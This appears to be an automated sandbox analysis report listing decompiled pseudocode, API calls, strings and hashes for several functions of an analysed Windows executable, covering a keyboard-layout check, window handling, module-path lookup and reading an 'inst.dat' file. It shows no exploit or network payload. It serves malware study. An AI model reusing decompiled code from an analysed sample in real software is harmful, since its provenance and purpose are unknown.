Uniqueness

Uniqueness Score: -1.00%

Function 0040B985, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B985() {
				int _t18;
				char** _t19;
				signed int _t20;
				int _t35;
				CHAR* _t38;
				void* _t40;

				E0043E4E0(0x43fd50, _t40);
				_t18 = GetKeyboardLayoutList(0x14, _t40 - 0x64);
				_t35 = _t18;
				if(_t35 != 0) {
					_t38 = "00000409";
					_t19 = GetKeyboardLayoutNameA(_t38);
					_push(_t38);
					L0043DE26();
					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
					_push(4);
					_push(_t40 - 0x10);
					L0043E13E();
					_t20 = strcmp( *_t19, "0409");
					if(_t20 == 0) {
						_push(1);
						_pop(0);
						if((_t20 & 0xffffff00 | _t35 == 0x00000000) == 0) {
							goto L3;
						}
					}
					L0043DD36();
					 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
					L0043DD36();
					_t18 = 0xbadbad;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				return _t18;
			}

0x0040b98a
0x0040b999
0x0040b99f
0x0040b9a3
0x0040b9a7
0x0040b9ad
0x0040b9b3
0x0040b9b7
0x0040b9bc
0x0040b9c3
0x0040b9c5
0x0040b9c8
0x0040b9d4
0x0040b9dd
0x0040b9df
0x0040b9e1
0x0040b9e9
0x00000000
0x00000000
0x0040b9e9
0x0040b9f0
0x0040b9f5
0x0040b9fc
0x0040ba06
0x0040ba09
0x0040ba0e
0x0040ba16

APIs

__EH_prolog.LIBCMT ref: 0040B98A
GetKeyboardLayoutList.USER32(00000014,?,00000002), ref: 0040B999
GetKeyboardLayoutNameA.USER32 ref: 0040B9AD
#537.MFC42(00000409), ref: 0040B9B7
#5710.MFC42(?,00000004,00000409), ref: 0040B9C8
strcmp.MSVCRT ref: 0040B9D4
#800.MFC42(?,00000004,00000409), ref: 0040B9F0
#800.MFC42(?,00000004,00000409), ref: 0040B9FC

Strings

00000409, xrefs: 0040B9A7, 0040B9AC, 0040B9B3
0409, xrefs: 0040B9CD

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800KeyboardLayout$#537#5710H_prologListNamestrcmp
String ID: 00000409$0409
API String ID: 2975956753-2673260605
Opcode ID: edc8e3bb83b6345c97c3937a199a8a7f54f4063021f613fcdd7c01fd508411ea
Instruction ID: 628ddd70bb0ee515d34ab87a973503fead1d398237ea043963dbeb7e1827e038
Opcode Fuzzy Hash: edc8e3bb83b6345c97c3937a199a8a7f54f4063021f613fcdd7c01fd508411ea
Instruction Fuzzy Hash: D9012232A012059BCB14EBA5ED52BEFB774EF59365F10053EF412A70D1DF384A048618

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA41, Relevance: 16.6, APIs: 11, Instructions: 93
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040DA41(void* __ecx) {
				signed int _v0;
				signed int _t23;
				signed int _t24;
				long _t30;
				intOrPtr* _t33;
				intOrPtr _t35;
				void* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;

				_t53 = __ecx;
				_push(0x4550cc);
				L0043E15C();
				_t23 =  *(__ecx + 0x488);
				if(_t23 < 0 || _t23 >=  *((intOrPtr*)(__ecx + 0x47c))) {
					L6:
					_t24 = _v0;
					if(_t24 < 0 || _t24 >=  *((intOrPtr*)(_t53 + 0x47c))) {
						goto L17;
					} else {
						_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x478)) + _t24 * 4));
						if(_t54 == 0 ||  *_t54 == 0) {
							goto L17;
						} else {
							_push( *((intOrPtr*)(_t54 + 0xc)));
							L0043E15C();
							if(IsWindow( *( *_t54 + 0x20)) == 0) {
								_push(_t53);
								_push( *( *_t54 + 0x60) & 0x0000ffff);
								L0043E0BA();
							}
							if(IsWindow( *( *_t54 + 0x20)) != 0) {
								_t33 = _t53 + 0x48c;
								_push(1);
								_push( *((intOrPtr*)(_t53 + 0x498)) -  *((intOrPtr*)(_t33 + 4)));
								_push( *((intOrPtr*)(_t33 + 8)) -  *_t33);
								_push( *((intOrPtr*)(_t53 + 0x490)));
								_push( *_t33);
								L0043E210();
								_push(5);
								L0043E0AE();
								L0043DF9A();
							}
							_t30 = E0040D90E(_t53,  *_t54);
							if(_t30 != 0) {
								SendMessageA( *(_t53 + 0x454), 0x110b, 9, _t30);
							}
							return 1;
						}
					}
				} else {
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x478)) + _t23 * 4));
					if(_t55 == 0) {
						L17:
						return 0;
					}
					_t35 =  *_t55;
					if(_t35 != 0 && IsWindow( *(_t35 + 0x20)) != 0) {
						_push(0);
						L0043E0AE();
					}
					goto L6;
				}
			}

0x0040da45
0x0040da47
0x0040da54
0x0040da59
0x0040da67
0x0040da9a
0x0040da9a
0x0040daa0
0x00000000
0x0040dab2
0x0040dab8
0x0040dabd
0x00000000
0x0040dacc
0x0040dacc
0x0040dad1
0x0040dadf
0x0040dae3
0x0040dae8
0x0040dae9
0x0040dae9
0x0040daf7
0x0040daff
0x0040db05
0x0040db0a
0x0040db10
0x0040db13
0x0040db19
0x0040db1b
0x0040db22
0x0040db24
0x0040db2b
0x0040db2b
0x0040db34
0x0040db3b
0x0040db4b
0x0040db4b
0x00000000
0x0040db51
0x0040dabd
0x0040da71
0x0040da77
0x0040da7c
0x0040db55
0x00000000
0x0040db55
0x0040da82
0x0040da86
0x0040da93
0x0040da95
0x0040da95
0x00000000
0x0040da86

APIs

#6199.MFC42(004550CC,?,?,?,00000000,0040D8F6,?,?), ref: 0040DA54
IsWindow.USER32(?), ref: 0040DA8B
#6215.MFC42(00000000,?,?,00000000,0040D8F6,?,?), ref: 0040DA95
#6199.MFC42(?,004550CC,?,?,?,00000000,0040D8F6,?,?), ref: 0040DAD1
IsWindow.USER32(?), ref: 0040DADB
#2086.MFC42(?,?,?,?,00000000,0040D8F6,?,?), ref: 0040DAE9
IsWindow.USER32(?), ref: 0040DAF3
#4299.MFC42(?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB1B
#6215.MFC42(00000005,?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB24
#5981.MFC42(00000005,?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB2B
SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 0040DB4B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#6199#6215$#2086#4299#5981MessageSend
String ID:
API String ID: 2769750442-0
Opcode ID: 26b6cb1dc9397ba8bd9c65571e47e32130f481cb389635e11f7536dadd9c8c41
Instruction ID: f4f29075cbcf2ee3111aa79e1e0396b9851cfc8700016e88fb13fdddba9173e7
Opcode Fuzzy Hash: 26b6cb1dc9397ba8bd9c65571e47e32130f481cb389635e11f7536dadd9c8c41
Instruction Fuzzy Hash: 77318170700201AFCB24EFA5CC91F66F7B5BF48704F01056EA5599B2E5CB35E859CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00427B73, Relevance: 16.6, APIs: 11, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00427B73(void* __ecx) {
				void* _t30;
				void* _t34;
				void* _t35;
				void* _t58;
				void* _t61;

				_t30 = E0043E4E0(0x442e14, _t61);
				_t58 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x64)) != 0 &&  *((intOrPtr*)(__ecx + 0x2720)) != 0 && ( *((intOrPtr*)(__ecx + 0x17f4)) == 0 ||  *((intOrPtr*)(__ecx + 0x68)) != 0)) {
					L0043DDD8();
					_push(_t61 - 0x10);
					_push(0x42d);
					 *(_t61 - 4) = 0;
					L0043E2E2();
					_push(E00429029(_t61 - 0x20, 0xe06d));
					_t34 = _t61 - 0x1c;
					_push(0x453690);
					_push(_t34);
					 *(_t61 - 4) = 1;
					L0043E168();
					 *(_t61 - 4) = 2;
					_push(_t61 - 0x10);
					_push(_t34);
					_t35 = _t61 - 0x18;
					_push(_t35);
					L0043E282();
					_push(0x5d);
					_push(_t35);
					 *(_t61 - 4) = 3;
					_push(_t61 - 0x14);
					L0043E14A();
					 *(_t61 - 4) = 7;
					L0043DD36();
					 *(_t61 - 4) = 6;
					L0043DD36();
					 *(_t61 - 4) = 5;
					L0043DD36();
					E004207FC();
					E004207D4(_t58 + 0x78,  *((intOrPtr*)(_t61 - 0x14)));
					_t30 = E004207FC();
					 *(_t61 - 4) = 0;
					L0043DD36();
					 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t30;
			}

0x00427b78
0x00427b82
0x00427b89
0x00427baf
0x00427bb9
0x00427bba
0x00427bbf
0x00427bc2
0x00427bd7
0x00427bd8
0x00427bdb
0x00427be0
0x00427be1
0x00427be5
0x00427bed
0x00427bf1
0x00427bf2
0x00427bf3
0x00427bf6
0x00427bf7
0x00427bfc
0x00427bfe
0x00427c02
0x00427c06
0x00427c07
0x00427c0f
0x00427c13
0x00427c1b
0x00427c1f
0x00427c27
0x00427c2b
0x00427c35
0x00427c3f
0x00427c46
0x00427c4e
0x00427c51
0x00427c56
0x00427c5d
0x00427c5d
0x00427c67
0x00427c6f

APIs

__EH_prolog.LIBCMT ref: 00427B78
#540.MFC42 ref: 00427BAF
#3097.MFC42(0000042D,?), ref: 00427BC2
#926.MFC42(?,00453690,00000000,0000042D,?), ref: 00427BE5
#922.MFC42(?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427BF7
#923.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C07
#800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C13
#800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C1F
#800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C2B
#800.MFC42(?,?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C51
#800.MFC42(?,?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C5D

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#3097#540#922#923#926H_prolog
String ID:
API String ID: 4233701136-0
Opcode ID: 3d31470087a3fe21e51d8ebe8a2a536c10d02f15494898ff5f4700071f82d017
Instruction ID: 27d25c4587f88064a11b2db2650742c316071f0c2dda3a31157d062046692efd
Opcode Fuzzy Hash: 3d31470087a3fe21e51d8ebe8a2a536c10d02f15494898ff5f4700071f82d017
Instruction Fuzzy Hash: D221A571D05299EADF15EBA1D995AEFBBB8AF08304F54045FE41273282DB7C1B04C629

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEA7, Relevance: 16.6, APIs: 11, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040FEA7() {
				void* _t28;
				int _t34;
				void* _t51;
				void* _t53;

				E0043E4E0(0x440448, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
				 *((intOrPtr*)(_t51 - 0x18)) = 0;
				 *(_t51 - 4) = 0;
				if(IsWindow( *(_t51 + 0xc)) == 0) {
					 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
					_push(0x4550cc);
					L0043DE26();
				} else {
					_t28 = SendMessageA( *(_t51 + 0xc), 0xe, 0, 0);
					_t6 = _t28 + 0xcb; // -197
					_t34 = _t6;
					_push(_t34);
					L0043DD54();
					 *(_t51 - 0x14) = _t28;
					memset(_t28, 0, _t34);
					SendMessageA( *(_t51 + 0xc), 0xd, _t28 + 0xca,  *(_t51 - 0x14));
					_push( *(_t51 - 0x14));
					L0043DE26();
					_push( *(_t51 - 0x14));
					 *(_t51 - 4) = 1;
					L0043DD42();
					_push(_t51 - 0x18);
					L0043DD3C();
					 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return  *((intOrPtr*)(_t51 + 8));
			}

0x0040feac
0x0040feb9
0x0040febf
0x0040fec2
0x0040fecd
0x0040ff48
0x0040ff4c
0x0040ff51
0x0040fecf
0x0040fedc
0x0040fee6
0x0040fee6
0x0040fee9
0x0040feea
0x0040fef0
0x0040fef7
0x0040ff0b
0x0040ff0d
0x0040ff13
0x0040ff18
0x0040ff1b
0x0040ff1f
0x0040ff2b
0x0040ff2c
0x0040ff31
0x0040ff38
0x0040ff38
0x0040ff5e
0x0040ff67

APIs

__EH_prolog.LIBCMT ref: 0040FEAC
IsWindow.USER32(?), ref: 0040FEC5
SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
#823.MFC42(-000000C5), ref: 0040FEEA
memset.MSVCRT ref: 0040FEF7
SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
#537.MFC42(?), ref: 0040FF13
#825.MFC42(?,?), ref: 0040FF1F
#535.MFC42(?,?), ref: 0040FF2C
#800.MFC42(?,?), ref: 0040FF38
#537.MFC42(004550CC), ref: 0040FF51

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537MessageSend$#535#800#823#825H_prologWindowmemset
String ID:
API String ID: 4122110621-0
Opcode ID: 23993d4854425e3dcc026690f47edc555cd86d2ab34a631e2e7954795e248cdf
Instruction ID: 60101947856509e48fc33cbc23c6782d2f32d38ee5eee394c3ac170a4607c917
Opcode Fuzzy Hash: 23993d4854425e3dcc026690f47edc555cd86d2ab34a631e2e7954795e248cdf
Instruction Fuzzy Hash: B321AE71D01109BBDB10EFA5EC02BDEBF78EF48364F10412AF91866190DB784A04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCFE, Relevance: 16.6, APIs: 11, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041FCFE(intOrPtr __ecx) {
				void* _t26;
				void* _t28;
				intOrPtr _t44;
				void* _t49;
				void* _t51;

				E0043E4E0(0x441e10, _t49);
				_t44 = __ecx;
				_push(0);
				 *((intOrPtr*)(_t49 - 0x18)) = __ecx;
				L0043E43E();
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				 *((intOrPtr*)(__ecx)) = 0x448ec8;
				GetModuleFileNameA(0, _t49 - 0x11c, 0x104);
				_t26 = _t49 - 0x11c;
				_push(_t26);
				L0043DE26();
				_push(0x5c);
				 *(_t49 - 4) = 1;
				L0043DFB8();
				_push(_t26 + 1);
				_t28 = _t49 - 0x10;
				_push(_t28);
				L0043DFD0();
				_push(_t28);
				 *(_t49 - 4) = 2;
				L0043DFCA();
				 *(_t49 - 4) = 1;
				L0043DD36();
				E0042AC90( *0x4558c8);
				 *((intOrPtr*)(_t51 - 0x110)) = "dt";
				_push(0x4558c8);
				_push(_t49 - 0x10);
				L0043DE20();
				 *(_t49 - 4) = 3;
				E0042AC90( *((intOrPtr*)(_t49 - 0x10)));
				 *(_t49 - 4) = 1;
				L0043DD36();
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t44;
			}

0x0041fd03
0x0041fd10
0x0041fd12
0x0041fd14
0x0041fd17
0x0041fd1c
0x0041fd2e
0x0041fd34
0x0041fd3a
0x0041fd43
0x0041fd44
0x0041fd49
0x0041fd4e
0x0041fd52
0x0041fd5b
0x0041fd5c
0x0041fd5f
0x0041fd60
0x0041fd6a
0x0041fd6d
0x0041fd71
0x0041fd79
0x0041fd7d
0x0041fd88
0x0041fd8d
0x0041fd97
0x0041fd98
0x0041fd99
0x0041fda0
0x0041fda4
0x0041fdaa
0x0041fdb1
0x0041fdb6
0x0041fdbd
0x0041fdc9
0x0041fdd1

APIs

__EH_prolog.LIBCMT ref: 0041FD03
#561.MFC42(00000000), ref: 0041FD17
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000), ref: 0041FD34
#537.MFC42(?), ref: 0041FD44
#5683.MFC42(0000005C,?), ref: 0041FD52
#4129.MFC42(?,00000001,0000005C,?), ref: 0041FD60
#858.MFC42(00000000,?,00000001,0000005C,?), ref: 0041FD71
#800.MFC42(00000000,?,00000001,0000005C,?), ref: 0041FD7D
#924.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FD99
#800.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FDB1
#800.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FDBD

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#4129#537#561#5683#858#924FileH_prologModuleName
String ID:
API String ID: 2896541598-0
Opcode ID: 3d5fe76244ad4cca5594ffcdb1c71594d4c787554e279c8a67c0ed3bb671c066
Instruction ID: bc935da24354569579f41680415b5a9f50e7230db7298927da8b1228761cfb12
Opcode Fuzzy Hash: 3d5fe76244ad4cca5594ffcdb1c71594d4c787554e279c8a67c0ed3bb671c066
Instruction Fuzzy Hash: 7821C671D002599ADB01FB95D956BEEBB78EF29308F10445EF101A71C2DBBC0A08CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004279C9, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
filestringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004279C9(void* __ecx, void* __edx) {
				char _v8;
				long _v12;
				char _v272;
				intOrPtr _v732;
				intOrPtr _v740;
				void _v1268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t20;
				void* _t26;
				void* _t28;
				void* _t34;
				void* _t35;
				void* _t38;

				_t34 = __edx;
				_t28 = __ecx;
				lstrcpyA( &_v272,  *0x4558c8);
				lstrcatA( &_v272, "inst.dat");
				_t35 = CreateFileA( &_v272, 0x80000000, 1, 0, 3, 0, 0);
				if(_t35 == 0xffffffff) {
					L5:
					return 0;
				}
				if(GetFileSize(_t35, 0) == 0x3e4) {
					_t20 = ReadFile(_t35,  &_v1268, 0x3e4,  &_v12, 0);
					_push(_t35);
					if(_t20 != 0) {
						CloseHandle();
						if(_v740 == 0) {
							goto L5;
						}
						_push(0x3e4);
						E00427A9F(_t38, _v732, 0, 0, 0);
						E00427AC2(_t28 + 0x1a0c, _t38, 0x3e4);
						_push( &_v8);
						L0043E162();
						if(L0042387B( &_v8, _t28, _t34, _t38, 0) == 0) {
							goto L5;
						}
						_t26 = 1;
						return _t26;
					}
					L4:
					CloseHandle();
					goto L5;
				}
				_push(_t35);
				goto L4;
			}

0x004279c9
0x004279e1
0x004279e4
0x004279f6
0x00427a17
0x00427a1c
0x00427a51
0x00000000
0x00427a51
0x00427a2d
0x00427a40
0x00427a48
0x00427a49
0x00427a58
0x00427a64
0x00000000
0x00000000
0x00427a66
0x00427a75
0x00427a81
0x00427a89
0x00427a8a
0x00427a98
0x00000000
0x00000000
0x00427a9c
0x00000000
0x00427a9c
0x00427a4b
0x00427a4b
0x00000000
0x00427a4b
0x00427a2f
0x00000000

APIs

lstrcpyA.KERNEL32(?), ref: 004279E4
lstrcatA.KERNEL32(?,inst.dat), ref: 004279F6
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00427A11
GetFileSize.KERNEL32(00000000,00000000), ref: 00427A20
ReadFile.KERNEL32(00000000,?,000003E4,?,00000000), ref: 00427A40
CloseHandle.KERNEL32(00000000), ref: 00427A4B
CloseHandle.KERNEL32(00000000), ref: 00427A58
#3811.MFC42(?,?,?,00000000,00000000,00000000), ref: 00427A8A

Strings

inst.dat, xrefs: 004279F0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: File$CloseHandle$#3811CreateReadSizelstrcatlstrcpy
String ID: inst.dat
API String ID: 3078242128-3562421779
Opcode ID: 303aae25589471d38981d2910a5f7c106e90ffe064a9ba0a741703533dd116ff
Instruction ID: aa19ae25e2d283c6323b81cf06509fe03560b4e33e8ee83ab1592fc80425d3ec
Opcode Fuzzy Hash: 303aae25589471d38981d2910a5f7c106e90ffe064a9ba0a741703533dd116ff
